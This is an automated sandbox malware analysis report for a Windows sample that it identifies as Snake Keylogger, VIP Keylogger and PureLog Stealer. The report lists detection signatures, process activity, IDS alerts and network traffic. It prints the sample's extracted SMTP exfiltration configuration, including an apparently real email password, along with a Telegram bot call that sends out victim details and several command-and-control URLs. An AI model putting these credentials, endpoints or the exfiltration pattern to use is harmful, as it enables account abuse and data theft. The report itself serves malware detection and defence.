Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kP8EgMorTr.exe

Overview

General Information

Sample name:kP8EgMorTr.exe
renamed because original name is a hash value
Original sample name:6889d04a51c7a76b2ab1b4161b2b5e5d17dc2780e29dcc78b41460f982986786.exe
Analysis ID:1584668
MD5:8a51bda9c0cd3d8519c1156dfa39426b
SHA1:bf1e7be7d44cf1f7499ee43d35aad3d9f8684b28
SHA256:6889d04a51c7a76b2ab1b4161b2b5e5d17dc2780e29dcc78b41460f982986786
Tags:exeSnakeKeyloggeruser-zhuzhu0009
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • kP8EgMorTr.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\kP8EgMorTr.exe" MD5: 8A51BDA9C0CD3D8519C1156DFA39426B)
    • kP8EgMorTr.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\kP8EgMorTr.exe" MD5: 8A51BDA9C0CD3D8519C1156DFA39426B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1254420339.00000000052D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d703:$a1: get_encryptedPassword
          • 0x2da20:$a2: get_encryptedUsername
          • 0x2d513:$a3: get_timePasswordChanged
          • 0x2d61c:$a4: get_passwordField
          • 0x2d719:$a5: set_encryptedPassword
          • 0x2edda:$a7: get_logins
          • 0x2ed3d:$a10: KeyLoggerEventArgs
          • 0x2e9a2:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.kP8EgMorTr.exe.52d0000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.kP8EgMorTr.exe.52d0000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.kP8EgMorTr.exe.3896ef8.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.kP8EgMorTr.exe.3896ef8.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  0.2.kP8EgMorTr.exe.3896ef8.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 35 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-06T07:41:11.372807+010028033053Unknown Traffic192.168.2.749706188.114.97.3443TCP
                    2025-01-06T07:41:25.823569+010028033053Unknown Traffic192.168.2.749784188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-06T07:41:07.750465+010028032742Potentially Bad Traffic192.168.2.749701132.226.8.16980TCP
                    2025-01-06T07:41:10.813013+010028032742Potentially Bad Traffic192.168.2.749701132.226.8.16980TCP
                    2025-01-06T07:41:14.219249+010028032742Potentially Bad Traffic192.168.2.749707132.226.8.16980TCP
                    2025-01-06T07:41:15.625492+010028032742Potentially Bad Traffic192.168.2.749709132.226.8.16980TCP
                    2025-01-06T07:41:19.984901+010028032742Potentially Bad Traffic192.168.2.749717132.226.8.16980TCP
                    2025-01-06T07:41:20.969278+010028032742Potentially Bad Traffic192.168.2.749741132.226.8.16980TCP
                    2025-01-06T07:41:22.422409+010028032742Potentially Bad Traffic192.168.2.749753132.226.8.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-06T07:41:26.698067+010018100071Potentially Bad Traffic192.168.2.749790149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}
                    Source: 0.2.kP8EgMorTr.exe.3896ef8.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587"}
                    Multi AV Scanner detection for submitted file
                    Source: kP8EgMorTr.exeVirustotal: Detection: 36%Perma Link
                    Source: kP8EgMorTr.exeReversingLabs: Detection: 39%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: kP8EgMorTr.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: kP8EgMorTr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49790 version: TLS 1.2
                    Source: kP8EgMorTr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 031CF2EDh3_2_031CF33C
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 031CF2EDh3_2_031CF150
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 031CFAA9h3_2_031CF7F1
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E931E8h3_2_05E92DCA
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E931E8h3_2_05E92DD0
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9F019h3_2_05E9ED70
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9E769h3_2_05E9E4C0
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9DEB9h3_2_05E9DC10
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9DA61h3_2_05E9D7B8
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9D1B1h3_2_05E9CF08
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9F8C9h3_2_05E9F620
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9F471h3_2_05E9F1C8
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E92C21h3_2_05E92970
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9EBC1h3_2_05E9E918
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E931E8h3_2_05E93116
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9E311h3_2_05E9E068
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_05E90040
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9D609h3_2_05E9D360
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E90D0Dh3_2_05E90B30
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E91697h3_2_05E90B30
                    Source: C:\Users\user\Desktop\kP8EgMorTr.exeCode function: 4x nop then jmp 05E9FD21h3_2_05E9FA78

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49790 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 3.2.kP8EgMorTr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3896ef8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.380fad8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kP8EgMorTr.exe.3729970.1.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2006/01/2025%20/%2020:38:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49741 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49709 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49753 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49717 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49784 -> 188.114.97.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2006/01/2025%20/%2020:38:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 06 Jan 2025 06:41:26 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: kP8EgMorTr.exeString found in binary or memory: http://www.omdbapi.com/?t=)&y=&plot=long&r=json
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: kP8EgMorTr.exe, 00000000.00000002.1249756112.0000000003729000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3697868899.0000000000402000.00000040.00000400.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.0000000003342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.000000000336C000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000033DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: kP8EgMorTr.exe, 00000003.00000002.3702114001.0000000004311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000034B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: kP8EgMorTr.exe, 00000003.00000002.3699670660.00000000034B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
